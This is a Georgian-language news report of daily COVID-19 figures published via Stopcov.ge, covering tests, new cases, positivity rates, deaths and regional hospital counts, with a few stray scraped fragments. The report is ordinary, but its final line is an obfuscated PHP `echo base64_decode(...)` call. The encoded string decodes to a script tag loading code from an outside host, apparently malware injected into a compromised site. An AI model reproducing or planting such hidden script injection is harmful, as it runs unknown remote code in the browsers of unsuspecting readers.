celsiusi
ავერსი შნაიდერი
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 9 688 კვლევა ტესტით, მათ შორის 6 768 კვლევა ანტიგენის ტესტით და 2 920 PCR ტესტით.
 
ჩატარებული ტესტირების შედეგად, ბოლო 24 საათში გამოვლინდა ვირუსით ინფიცირების 4 028 ახალი დადასტურებული შემთხვევა. ქვეყანაში კოვიდ-19-ის პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობა შეადგენს 1 458 093.
 
რაც შეეხება დადებითობის მაჩვენებელს, 13 თებერვლის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 41.58%, ბოლო 14 დღის მანძილზე - 31.92% ხოლო 7 დღის მანძილზე - 33.03%.
 
ბოლო 24 საათში ვირუსისგან გამოჯანმრთელდა 22 517 პირი, ხოლო ჯამში გამოჯანმრთელებულთა რაოდენობა გაიზარდა 1 270 759.
 
ბოლო 24 საათში კორონავირუსით გარდაცვალების 21 ახალი შემთხვევა დაფიქსირდა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 15 577 პირი ემსხვერპლა.
 
"დღეს ქვეყანაში გამოვლენილი ინფიცირების 4 028 ახალი შემთხვევიდან: თბილისში გამოვლენილია 2 228 შემთხვევა, აჭარა - 303, იმერეთი - 450, ქვემო ქართლი - 259, შიდა ქართლი - 207, გურია - 89, სამეგრელო - ზემო სვანეთი - 203, კახეთი - 210, მცხეთა-მთიანეთი - 27, სამცხე-ჯავახეთი - 48, რაჭა-ლეჩხუმი და ქვემო სვანეთი - 4.
 
ამ ეტაპზე ინფიცირების მიმდინარე აქტიური შემთხვევა 171 731 საიდანაც: 6 202 ადამიანი მკურნალობს საავადმყოფოში, მათ შორის, თბილისის საავადმყოფოებში - 2 500, აჭარაში - 761, იმერეთში - 1 213.
 
ამ ეტაპზე მძიმე პაციენტია 1 307 პირი, მათ შორის, თბილისში - 485, აჭარაში - 156, იმერეთში - 425. ხელოვნური სუნთქვის აპარატზე იმყოფება 285 პირი, მათგან თბილისში - 159, აჭარაში - 40, იმერეთში - 24.
 
1 481 ადამიანი მოთავსებულია კლინიკურ-სასტუმროებში, მათ შორის 878 - თბილისში, 406 - აჭარაში.
164 048 პირი ვირუსის მკურნალობის კურსს გადის საცხოვრებელ ბინაზე.
 
საკარანტინე სივრცეებში მოთავსებულია 10 ადამიანი, მათ შორის, თბილისში - 10, ხოლო აჭარაში - 0", - ნათქვამია ინფორმაციაში, რომელიც მთავრობის ადმინისტრაციამ გაავრცელა.
760
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");